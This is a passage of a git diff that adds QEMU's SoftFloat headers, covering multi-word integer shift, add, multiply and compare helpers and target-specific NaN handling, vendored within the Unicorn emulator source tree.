+*----------------------------------------------------------------------------*/ +#if defined(__GNUC__) && defined(__GNUC_MINOR__) +# define SOFTFLOAT_GNUC_PREREQ(maj, min) \ + ((__GNUC__ << 16) + __GNUC_MINOR__ >= ((maj) << 16) + (min)) +#else +# define SOFTFLOAT_GNUC_PREREQ(maj, min) 0 +#endif + + +/*---------------------------------------------------------------------------- +| Shifts `a' right by the number of bits given in `count'. If any nonzero +| bits are shifted off, they are ``jammed'' into the least significant bit of +| the result by setting the least significant bit to 1. The value of `count' +| can be arbitrarily large; in particular, if `count' is greater than 32, the +| result will be either 0 or 1, depending on whether `a' is zero or nonzero. +| The result is stored in the location pointed to by `zPtr'. +*----------------------------------------------------------------------------*/ + +static inline void shift32RightJamming(uint32_t a, int_fast16_t count, uint32_t *zPtr) +{ + uint32_t z; + + if ( count == 0 ) { + z = a; + } + else if ( count < 32 ) { + z = ( a>>count ) | ( ( a<<( ( - count ) & 31 ) ) != 0 ); + } + else { + z = ( a != 0 ); + } + *zPtr = z; + +} + +/*---------------------------------------------------------------------------- +| Shifts `a' right by the number of bits given in `count'. If any nonzero +| bits are shifted off, they are ``jammed'' into the least significant bit of +| the result by setting the least significant bit to 1. The value of `count' +| can be arbitrarily large; in particular, if `count' is greater than 64, the +| result will be either 0 or 1, depending on whether `a' is zero or nonzero. +| The result is stored in the location pointed to by `zPtr'. 
+*----------------------------------------------------------------------------*/ + +static inline void shift64RightJamming(uint64_t a, int_fast16_t count, uint64_t *zPtr) +{ + uint64_t z; + + if ( count == 0 ) { + z = a; + } + else if ( count < 64 ) { + z = ( a>>count ) | ( ( a<<( ( - count ) & 63 ) ) != 0 ); + } + else { + z = ( a != 0 ); + } + *zPtr = z; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 128-bit value formed by concatenating `a0' and `a1' right by 64 +| _plus_ the number of bits given in `count'. The shifted result is at most +| 64 nonzero bits; this is stored at the location pointed to by `z0Ptr'. The +| bits shifted off form a second 64-bit result as follows: The _last_ bit +| shifted off is the most-significant bit of the extra result, and the other +| 63 bits of the extra result are all zero if and only if _all_but_the_last_ +| bits shifted off were all zero. This extra result is stored in the location +| pointed to by `z1Ptr'. The value of `count' can be arbitrarily large. +| (This routine makes more sense if `a0' and `a1' are considered to form +| a fixed-point value with binary point between `a0' and `a1'. This fixed- +| point value is shifted right by the number of bits given in `count', and +| the integer part of the result is returned at the location pointed to by +| `z0Ptr'. The fractional part of the result may be slightly corrupted as +| described above, and is returned at the location pointed to by `z1Ptr'.) 
+*----------------------------------------------------------------------------*/ + +static inline void + shift64ExtraRightJamming( + uint64_t a0, uint64_t a1, int_fast16_t count, uint64_t *z0Ptr, uint64_t *z1Ptr) +{ + uint64_t z0, z1; + int8 negCount = ( - count ) & 63; + + if ( count == 0 ) { + z1 = a1; + z0 = a0; + } + else if ( count < 64 ) { + z1 = ( a0<<negCount ) | ( a1 != 0 ); + z0 = a0>>count; + } + else { + if ( count == 64 ) { + z1 = a0 | ( a1 != 0 ); + } + else { + z1 = ( ( a0 | a1 ) != 0 ); + } + z0 = 0; + } + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 128-bit value formed by concatenating `a0' and `a1' right by the +| number of bits given in `count'. Any bits shifted off are lost. The value +| of `count' can be arbitrarily large; in particular, if `count' is greater +| than 128, the result will be 0. The result is broken into two 64-bit pieces +| which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + shift128Right( + uint64_t a0, uint64_t a1, int_fast16_t count, uint64_t *z0Ptr, uint64_t *z1Ptr) +{ + uint64_t z0, z1; + int8 negCount = ( - count ) & 63; + + if ( count == 0 ) { + z1 = a1; + z0 = a0; + } + else if ( count < 64 ) { + z1 = ( a0<<negCount ) | ( a1>>count ); + z0 = a0>>count; + } + else { + z1 = (count < 128) ? (a0 >> (count & 63)) : 0; + z0 = 0; + } + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 128-bit value formed by concatenating `a0' and `a1' right by the +| number of bits given in `count'. If any nonzero bits are shifted off, they +| are ``jammed'' into the least significant bit of the result by setting the +| least significant bit to 1. 
The value of `count' can be arbitrarily large; +| in particular, if `count' is greater than 128, the result will be either +| 0 or 1, depending on whether the concatenation of `a0' and `a1' is zero or +| nonzero. The result is broken into two 64-bit pieces which are stored at +| the locations pointed to by `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + shift128RightJamming( + uint64_t a0, uint64_t a1, int_fast16_t count, uint64_t *z0Ptr, uint64_t *z1Ptr) +{ + uint64_t z0, z1; + int8 negCount = ( - count ) & 63; + + if ( count == 0 ) { + z1 = a1; + z0 = a0; + } + else if ( count < 64 ) { + z1 = ( a0<<negCount ) | ( a1>>count ) | ( ( a1<<negCount ) != 0 ); + z0 = a0>>count; + } + else { + if ( count == 64 ) { + z1 = a0 | ( a1 != 0 ); + } + else if ( count < 128 ) { + z1 = ( a0>>( count & 63 ) ) | ( ( ( a0<<negCount ) | a1 ) != 0 ); + } + else { + z1 = ( ( a0 | a1 ) != 0 ); + } + z0 = 0; + } + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 192-bit value formed by concatenating `a0', `a1', and `a2' right +| by 64 _plus_ the number of bits given in `count'. The shifted result is +| at most 128 nonzero bits; these are broken into two 64-bit pieces which are +| stored at the locations pointed to by `z0Ptr' and `z1Ptr'. The bits shifted +| off form a third 64-bit result as follows: The _last_ bit shifted off is +| the most-significant bit of the extra result, and the other 63 bits of the +| extra result are all zero if and only if _all_but_the_last_ bits shifted off +| were all zero. This extra result is stored in the location pointed to by +| `z2Ptr'. The value of `count' can be arbitrarily large. +| (This routine makes more sense if `a0', `a1', and `a2' are considered +| to form a fixed-point value with binary point between `a1' and `a2'. 
This +| fixed-point value is shifted right by the number of bits given in `count', +| and the integer part of the result is returned at the locations pointed to +| by `z0Ptr' and `z1Ptr'. The fractional part of the result may be slightly +| corrupted as described above, and is returned at the location pointed to by +| `z2Ptr'.) +*----------------------------------------------------------------------------*/ + +static inline void + shift128ExtraRightJamming( + uint64_t a0, + uint64_t a1, + uint64_t a2, + int_fast16_t count, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2; + int8 negCount = ( - count ) & 63; + + if ( count == 0 ) { + z2 = a2; + z1 = a1; + z0 = a0; + } + else { + if ( count < 64 ) { + z2 = a1<<negCount; + z1 = ( a0<<negCount ) | ( a1>>count ); + z0 = a0>>count; + } + else { + if ( count == 64 ) { + z2 = a1; + z1 = a0; + } + else { + a2 |= a1; + if ( count < 128 ) { + z2 = a0<<negCount; + z1 = a0>>( count & 63 ); + } + else { + z2 = ( count == 128 ) ? a0 : ( a0 != 0 ); + z1 = 0; + } + } + z0 = 0; + } + z2 |= ( a2 != 0 ); + } + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Shifts the 128-bit value formed by concatenating `a0' and `a1' left by the +| number of bits given in `count'. Any bits shifted off are lost. The value +| of `count' must be less than 64. The result is broken into two 64-bit +| pieces which are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + shortShift128Left( + uint64_t a0, uint64_t a1, int_fast16_t count, uint64_t *z0Ptr, uint64_t *z1Ptr) +{ + + *z1Ptr = a1<<(count & 0x3f); + *z0Ptr = + ( count == 0 ) ? 
a0 : ( a0<<(count & 0x3f) ) | ( a1>>( ( - count ) & 63 ) ); + +} + +/*---------------------------------------------------------------------------- +| Shifts the 192-bit value formed by concatenating `a0', `a1', and `a2' left +| by the number of bits given in `count'. Any bits shifted off are lost. +| The value of `count' must be less than 64. The result is broken into three +| 64-bit pieces which are stored at the locations pointed to by `z0Ptr', +| `z1Ptr', and `z2Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + shortShift192Left( + uint64_t a0, + uint64_t a1, + uint64_t a2, + int_fast16_t count, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2; + int8 negCount; + + z2 = a2<<count; + z1 = a1<<count; + z0 = a0<<count; + if ( 0 < count ) { + negCount = ( ( - count ) & 63 ); + z1 |= a2>>negCount; + z0 |= a1>>negCount; + } + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Adds the 128-bit value formed by concatenating `a0' and `a1' to the 128-bit +| value formed by concatenating `b0' and `b1'. Addition is modulo 2^128, so +| any carry out is lost. The result is broken into two 64-bit pieces which +| are stored at the locations pointed to by `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + add128( + uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr ) +{ + uint64_t z1; + + z1 = a1 + b1; + *z1Ptr = z1; + *z0Ptr = a0 + b0 + ( z1 < a1 ); + +} + +/*---------------------------------------------------------------------------- +| Adds the 192-bit value formed by concatenating `a0', `a1', and `a2' to the +| 192-bit value formed by concatenating `b0', `b1', and `b2'. Addition is +| modulo 2^192, so any carry out is lost. 
The result is broken into three +| 64-bit pieces which are stored at the locations pointed to by `z0Ptr', +| `z1Ptr', and `z2Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + add192( + uint64_t a0, + uint64_t a1, + uint64_t a2, + uint64_t b0, + uint64_t b1, + uint64_t b2, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2; + int8 carry0, carry1; + + z2 = a2 + b2; + carry1 = ( z2 < a2 ); + z1 = a1 + b1; + carry0 = ( z1 < a1 ); + z0 = a0 + b0; + z1 += carry1; + z0 += ( z1 < carry1 ); + z0 += carry0; + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Subtracts the 128-bit value formed by concatenating `b0' and `b1' from the +| 128-bit value formed by concatenating `a0' and `a1'. Subtraction is modulo +| 2^128, so any borrow out (carry out) is lost. The result is broken into two +| 64-bit pieces which are stored at the locations pointed to by `z0Ptr' and +| `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + sub128( + uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1, uint64_t *z0Ptr, uint64_t *z1Ptr ) +{ + + *z1Ptr = a1 - b1; + *z0Ptr = a0 - b0 - ( a1 < b1 ); + +} + +/*---------------------------------------------------------------------------- +| Subtracts the 192-bit value formed by concatenating `b0', `b1', and `b2' +| from the 192-bit value formed by concatenating `a0', `a1', and `a2'. +| Subtraction is modulo 2^192, so any borrow out (carry out) is lost. The +| result is broken into three 64-bit pieces which are stored at the locations +| pointed to by `z0Ptr', `z1Ptr', and `z2Ptr'. 
+*----------------------------------------------------------------------------*/ + +static inline void + sub192( + uint64_t a0, + uint64_t a1, + uint64_t a2, + uint64_t b0, + uint64_t b1, + uint64_t b2, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2; + int8 borrow0, borrow1; + + z2 = a2 - b2; + borrow1 = ( a2 < b2 ); + z1 = a1 - b1; + borrow0 = ( a1 < b1 ); + z0 = a0 - b0; + z0 -= ( z1 < borrow1 ); + z1 -= borrow1; + z0 -= borrow0; + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Multiplies `a' by `b' to obtain a 128-bit product. The product is broken +| into two 64-bit pieces which are stored at the locations pointed to by +| `z0Ptr' and `z1Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void mul64To128( uint64_t a, uint64_t b, uint64_t *z0Ptr, uint64_t *z1Ptr ) +{ + uint32_t aHigh, aLow, bHigh, bLow; + uint64_t z0, zMiddleA, zMiddleB, z1; + + aLow = (uint32_t)a; + aHigh = a>>32; + bLow = (uint32_t)b; + bHigh = b>>32; + z1 = ( (uint64_t) aLow ) * bLow; + zMiddleA = ( (uint64_t) aLow ) * bHigh; + zMiddleB = ( (uint64_t) aHigh ) * bLow; + z0 = ( (uint64_t) aHigh ) * bHigh; + zMiddleA += zMiddleB; + z0 += ( ( (uint64_t) ( zMiddleA < zMiddleB ) )<<32 ) + ( zMiddleA>>32 ); + zMiddleA <<= 32; + z1 += zMiddleA; + z0 += ( z1 < zMiddleA ); + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Multiplies the 128-bit value formed by concatenating `a0' and `a1' by +| `b' to obtain a 192-bit product. The product is broken into three 64-bit +| pieces which are stored at the locations pointed to by `z0Ptr', `z1Ptr', and +| `z2Ptr'. 
+*----------------------------------------------------------------------------*/ + +static inline void + mul128By64To192( + uint64_t a0, + uint64_t a1, + uint64_t b, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr + ) +{ + uint64_t z0, z1, z2, more1; + + mul64To128( a1, b, &z1, &z2 ); + mul64To128( a0, b, &z0, &more1 ); + add128( z0, more1, 0, z1, &z0, &z1 ); + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Multiplies the 128-bit value formed by concatenating `a0' and `a1' to the +| 128-bit value formed by concatenating `b0' and `b1' to obtain a 256-bit +| product. The product is broken into four 64-bit pieces which are stored at +| the locations pointed to by `z0Ptr', `z1Ptr', `z2Ptr', and `z3Ptr'. +*----------------------------------------------------------------------------*/ + +static inline void + mul128To256( + uint64_t a0, + uint64_t a1, + uint64_t b0, + uint64_t b1, + uint64_t *z0Ptr, + uint64_t *z1Ptr, + uint64_t *z2Ptr, + uint64_t *z3Ptr + ) +{ + uint64_t z0, z1, z2, z3; + uint64_t more1, more2; + + mul64To128( a1, b1, &z2, &z3 ); + mul64To128( a1, b0, &z1, &more2 ); + add128( z1, more2, 0, z2, &z1, &z2 ); + mul64To128( a0, b0, &z0, &more1 ); + add128( z0, more1, 0, z1, &z0, &z1 ); + mul64To128( a0, b1, &more1, &more2 ); + add128( more1, more2, 0, z2, &more1, &z2 ); + add128( z0, z1, 0, more1, &z0, &z1 ); + *z3Ptr = z3; + *z2Ptr = z2; + *z1Ptr = z1; + *z0Ptr = z0; + +} + +/*---------------------------------------------------------------------------- +| Returns an approximation to the 64-bit integer quotient obtained by dividing +| `b' into the 128-bit value formed by concatenating `a0' and `a1'. The +| divisor `b' must be at least 2^63. If q is the exact quotient truncated +| toward zero, the approximation returned lies between q and q + 2 inclusive. +| If the exact quotient q is larger than 64 bits, the maximum positive 64-bit +| unsigned integer is returned. 
+*----------------------------------------------------------------------------*/ + +static uint64_t estimateDiv128To64( uint64_t a0, uint64_t a1, uint64_t b ) +{ + uint64_t b0, b1; + uint64_t rem0, rem1, term0, term1; + uint64_t z; + + if ( b <= a0 ) return LIT64( 0xFFFFFFFFFFFFFFFF ); + b0 = b>>32; + z = ( b0<<32 <= a0 ) ? LIT64( 0xFFFFFFFF00000000 ) : ( a0 / b0 )<<32; + mul64To128( b, z, &term0, &term1 ); + sub128( a0, a1, term0, term1, &rem0, &rem1 ); + while ( ( (int64_t) rem0 ) < 0 ) { + z -= LIT64( 0x100000000 ); + b1 = b<<32; + add128( rem0, rem1, b0, b1, &rem0, &rem1 ); + } + rem0 = ( rem0<<32 ) | ( rem1>>32 ); + z |= ( b0<<32 <= rem0 ) ? 0xFFFFFFFF : rem0 / b0; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns an approximation to the square root of the 32-bit significand given +| by `a'. Considered as an integer, `a' must be at least 2^31. If bit 0 of +| `aExp' (the least significant bit) is 1, the integer returned approximates +| 2^31*sqrt(`a'/2^31), where `a' is considered an integer. If bit 0 of `aExp' +| is 0, the integer returned approximates 2^31*sqrt(`a'/2^30). In either +| case, the approximation returned lies strictly within +/-2 of the exact +| value. 
+*----------------------------------------------------------------------------*/ + +static uint32_t estimateSqrt32(int_fast16_t aExp, uint32_t a) +{ + static const uint16_t sqrtOddAdjustments[] = { + 0x0004, 0x0022, 0x005D, 0x00B1, 0x011D, 0x019F, 0x0236, 0x02E0, + 0x039C, 0x0468, 0x0545, 0x0631, 0x072B, 0x0832, 0x0946, 0x0A67 + }; + static const uint16_t sqrtEvenAdjustments[] = { + 0x0A2D, 0x08AF, 0x075A, 0x0629, 0x051A, 0x0429, 0x0356, 0x029E, + 0x0200, 0x0179, 0x0109, 0x00AF, 0x0068, 0x0034, 0x0012, 0x0002 + }; + int8 index; + uint32_t z; + + index = ( a>>27 ) & 15; + if ( aExp & 1 ) { + z = 0x4000 + ( a>>17 ) - sqrtOddAdjustments[ (int)index ]; + z = ( ( a / z )<<14 ) + ( z<<15 ); + a >>= 1; + } + else { + z = 0x8000 + ( a>>17 ) - sqrtEvenAdjustments[ (int)index ]; + z = a / z + z; + z = ( 0x20000 <= z ) ? 0xFFFF8000 : ( z<<15 ); + if ( z <= a ) return (uint32_t) ( ( (int32_t) a )>>1 ); + } + return ( (uint32_t) ( ( ( (uint64_t) a )<<31 ) / z ) ) + ( z>>1 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the number of leading 0 bits before the most-significant 1 bit of +| `a'. If `a' is zero, 32 is returned. 
+*----------------------------------------------------------------------------*/ + +static int8 countLeadingZeros32( uint32_t a ) +{ +#if SOFTFLOAT_GNUC_PREREQ(3, 4) + if (a) { + return __builtin_clz(a); + } else { + return 32; + } +#else + static const int8 countLeadingZerosHigh[] = { + 8, 7, 6, 6, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, + 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 + }; + int8 shiftCount; + + shiftCount = 0; + if ( a < 0x10000 ) { + shiftCount += 16; + a <<= 16; + } + if ( a < 0x1000000 ) { + shiftCount += 8; + a <<= 8; + } + shiftCount += countLeadingZerosHigh[ a>>24 ]; + return shiftCount; +#endif +} + +/*---------------------------------------------------------------------------- +| Returns the number of leading 0 bits before the most-significant 1 bit of +| `a'. If `a' is zero, 64 is returned. 
+*----------------------------------------------------------------------------*/ + +static int8 countLeadingZeros64( uint64_t a ) +{ +#if SOFTFLOAT_GNUC_PREREQ(3, 4) + if (a) { + return __builtin_clzll(a); + } else { + return 64; + } +#else + int8 shiftCount; + + shiftCount = 0; + if ( a < ( (uint64_t) 1 )<<32 ) { + shiftCount += 32; + } + else { + a >>= 32; + } + shiftCount += countLeadingZeros32( (uint32_t)a ); + return shiftCount; +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' +| is equal to the 128-bit value formed by concatenating `b0' and `b1'. +| Otherwise, returns 0. +*----------------------------------------------------------------------------*/ + +static inline flag eq128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) +{ + + return ( a0 == b0 ) && ( a1 == b1 ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is less +| than or equal to the 128-bit value formed by concatenating `b0' and `b1'. +| Otherwise, returns 0. +*----------------------------------------------------------------------------*/ + +static inline flag le128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) +{ + + return ( a0 < b0 ) || ( ( a0 == b0 ) && ( a1 <= b1 ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is less +| than the 128-bit value formed by concatenating `b0' and `b1'. Otherwise, +| returns 0. 
+*----------------------------------------------------------------------------*/ + +static inline flag lt128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) +{ + + return ( a0 < b0 ) || ( ( a0 == b0 ) && ( a1 < b1 ) ); + +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the 128-bit value formed by concatenating `a0' and `a1' is +| not equal to the 128-bit value formed by concatenating `b0' and `b1'. +| Otherwise, returns 0. +*----------------------------------------------------------------------------*/ + +static inline flag ne128( uint64_t a0, uint64_t a1, uint64_t b0, uint64_t b1 ) +{ + + return ( a0 != b0 ) || ( a1 != b1 ); + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-specialize.h b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-specialize.h new file mode 100644 index 0000000..549b425 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-specialize.h @@ -0,0 +1,1161 @@ +/* + * QEMU float support + * + * Derived from SoftFloat. + */ + +/*============================================================================ + +This C source fragment is part of the SoftFloat IEC/IEEE Floating-point +Arithmetic Package, Release 2b. + +Written by John R. Hauser. This work was made possible in part by the +International Computer Science Institute, located at Suite 600, 1947 Center +Street, Berkeley, California 94704. Funding was partially provided by the +National Science Foundation under grant MIP-9311980. The original version +of this code was written as part of a project to build a fixed-point vector +processor in collaboration with the University of California at Berkeley, +overseen by Profs. Nelson Morgan and John Wawrzynek. More information +is available through the Web page `http://www.cs.berkeley.edu/~jhauser/ +arithmetic/SoftFloat.html'. + +THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. 
Although reasonable effort has +been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES +RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS +AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ALL LOSSES, +COSTS, OR OTHER PROBLEMS THEY INCUR DUE TO THE SOFTWARE, AND WHO FURTHERMORE +EFFECTIVELY INDEMNIFY JOHN HAUSER AND THE INTERNATIONAL COMPUTER SCIENCE +INSTITUTE (possibly via similar legal warning) AGAINST ALL LOSSES, COSTS, OR +OTHER PROBLEMS INCURRED BY THEIR CUSTOMERS AND CLIENTS DUE TO THE SOFTWARE. + +Derivative works are acceptable, even for commercial purposes, so long as +(1) the source code for the derivative work includes prominent notice that +the work is derivative, and (2) the source code includes prominent notice with +these four paragraphs for those parts of this code that are retained. + +=============================================================================*/ + +#if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) +#define SNAN_BIT_IS_ONE 1 +#else +#define SNAN_BIT_IS_ONE 0 +#endif + +#if defined(TARGET_XTENSA) +/* Define for architectures which deviate from IEEE in not supporting + * signaling NaNs (so all NaNs are treated as quiet). + */ +#define NO_SIGNALING_NANS 1 +#endif + +/*---------------------------------------------------------------------------- +| The pattern for a default generated half-precision NaN. +*----------------------------------------------------------------------------*/ +#if defined(TARGET_ARM) +const float16 float16_default_nan = const_float16(0x7E00); +#elif SNAN_BIT_IS_ONE +const float16 float16_default_nan = const_float16(0x7DFF); +#else +const float16 float16_default_nan = const_float16(0xFE00); +#endif + +/*---------------------------------------------------------------------------- +| The pattern for a default generated single-precision NaN. 
+*----------------------------------------------------------------------------*/ +#if defined(TARGET_SPARC) +const float32 float32_default_nan = const_float32(0x7FFFFFFF); +#elif defined(TARGET_PPC) || defined(TARGET_ARM) || defined(TARGET_ALPHA) || \ + defined(TARGET_XTENSA) +const float32 float32_default_nan = const_float32(0x7FC00000); +#elif SNAN_BIT_IS_ONE +const float32 float32_default_nan = const_float32(0x7FBFFFFF); +#else +const float32 float32_default_nan = const_float32(0xFFC00000); +#endif + +/*---------------------------------------------------------------------------- +| The pattern for a default generated double-precision NaN. +*----------------------------------------------------------------------------*/ +#if defined(TARGET_SPARC) +const float64 float64_default_nan = const_float64(LIT64( 0x7FFFFFFFFFFFFFFF )); +#elif defined(TARGET_PPC) || defined(TARGET_ARM) || defined(TARGET_ALPHA) +const float64 float64_default_nan = const_float64(LIT64( 0x7FF8000000000000 )); +#elif SNAN_BIT_IS_ONE +const float64 float64_default_nan = const_float64(LIT64( 0x7FF7FFFFFFFFFFFF )); +#else +const float64 float64_default_nan = const_float64(LIT64( 0xFFF8000000000000 )); +#endif + +/*---------------------------------------------------------------------------- +| The pattern for a default generated extended double-precision NaN. +*----------------------------------------------------------------------------*/ +#if SNAN_BIT_IS_ONE +#define floatx80_default_nan_high 0x7FFF +#define floatx80_default_nan_low LIT64( 0xBFFFFFFFFFFFFFFF ) +#else +#define floatx80_default_nan_high 0xFFFF +#define floatx80_default_nan_low LIT64( 0xC000000000000000 ) +#endif + +const floatx80 floatx80_default_nan + = make_floatx80_init(floatx80_default_nan_high, floatx80_default_nan_low); + +/*---------------------------------------------------------------------------- +| The pattern for a default generated quadruple-precision NaN. 
The `high' and +| `low' values hold the most- and least-significant bits, respectively. +*----------------------------------------------------------------------------*/ +#if SNAN_BIT_IS_ONE +#define float128_default_nan_high LIT64( 0x7FFF7FFFFFFFFFFF ) +#define float128_default_nan_low LIT64( 0xFFFFFFFFFFFFFFFF ) +#else +#define float128_default_nan_high LIT64( 0xFFFF800000000000 ) +#define float128_default_nan_low LIT64( 0x0000000000000000 ) +#endif + +const float128 float128_default_nan + = make_float128_init(float128_default_nan_high, float128_default_nan_low); + +/*---------------------------------------------------------------------------- +| Raises the exceptions specified by `flags'. Floating-point traps can be +| defined here if desired. It is currently not possible for such a trap +| to substitute a result value. If traps are not implemented, this routine +| should be simply `float_exception_flags |= flags;'. +*----------------------------------------------------------------------------*/ + +void float_raise( uint8_t flags STATUS_PARAM ) +{ + STATUS(float_exception_flags) |= flags; +} + +/*---------------------------------------------------------------------------- +| Internal canonical NaN format. +*----------------------------------------------------------------------------*/ +typedef struct { + flag sign; + uint64_t high, low; +} commonNaNT; + +#ifdef NO_SIGNALING_NANS +int float16_is_quiet_nan(float16 a_) +{ + return float16_is_any_nan(a_); +} + +int float16_is_signaling_nan(float16 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the half-precision floating-point value `a' is a quiet +| NaN; otherwise returns 0. 
+*----------------------------------------------------------------------------*/ + +int float16_is_quiet_nan(float16 a_) +{ + uint16_t a = float16_val(a_); +#if SNAN_BIT_IS_ONE + return (((a >> 9) & 0x3F) == 0x3E) && (a & 0x1FF); +#else + return ((a & ~0x8000) >= 0x7c80); +#endif +} + +/*---------------------------------------------------------------------------- +| Returns 1 if the half-precision floating-point value `a' is a signaling +| NaN; otherwise returns 0. +*----------------------------------------------------------------------------*/ + +int float16_is_signaling_nan(float16 a_) +{ + uint16_t a = float16_val(a_); +#if SNAN_BIT_IS_ONE + return ((a & ~0x8000) >= 0x7c80); +#else + return (((a >> 9) & 0x3F) == 0x3E) && (a & 0x1FF); +#endif +} +#endif + +/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the half-precision floating point value `a' is a +| signaling NaN; otherwise returns `a'. +*----------------------------------------------------------------------------*/ +float16 float16_maybe_silence_nan(float16 a_) +{ + if (float16_is_signaling_nan(a_)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + return float16_default_nan; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + uint16_t a = float16_val(a_); + a |= (1 << 9); + return make_float16(a); +#endif + } + return a_; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the half-precision floating-point NaN +| `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid +| exception is raised. 
+*----------------------------------------------------------------------------*/ + +static commonNaNT float16ToCommonNaN( float16 a STATUS_PARAM ) +{ + commonNaNT z; + + if ( float16_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR ); + z.sign = float16_val(a) >> 15; + z.low = 0; + z.high = ((uint64_t) float16_val(a))<<54; + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the half- +| precision floating-point format. +*----------------------------------------------------------------------------*/ + +static float16 commonNaNToFloat16(commonNaNT a STATUS_PARAM) +{ + uint16_t mantissa = a.high>>54; + + if (STATUS(default_nan_mode)) { + return float16_default_nan; + } + + if (mantissa) { + return make_float16(((((uint16_t) a.sign) << 15) + | (0x1F << 10) | mantissa)); + } else { + return float16_default_nan; + } +} + +#ifdef NO_SIGNALING_NANS +int float32_is_quiet_nan(float32 a_) +{ + return float32_is_any_nan(a_); +} + +int float32_is_signaling_nan(float32 a_) +{ + return 0; +} +#else +/*---------------------------------------------------------------------------- +| Returns 1 if the single-precision floating-point value `a' is a quiet +| NaN; otherwise returns 0. 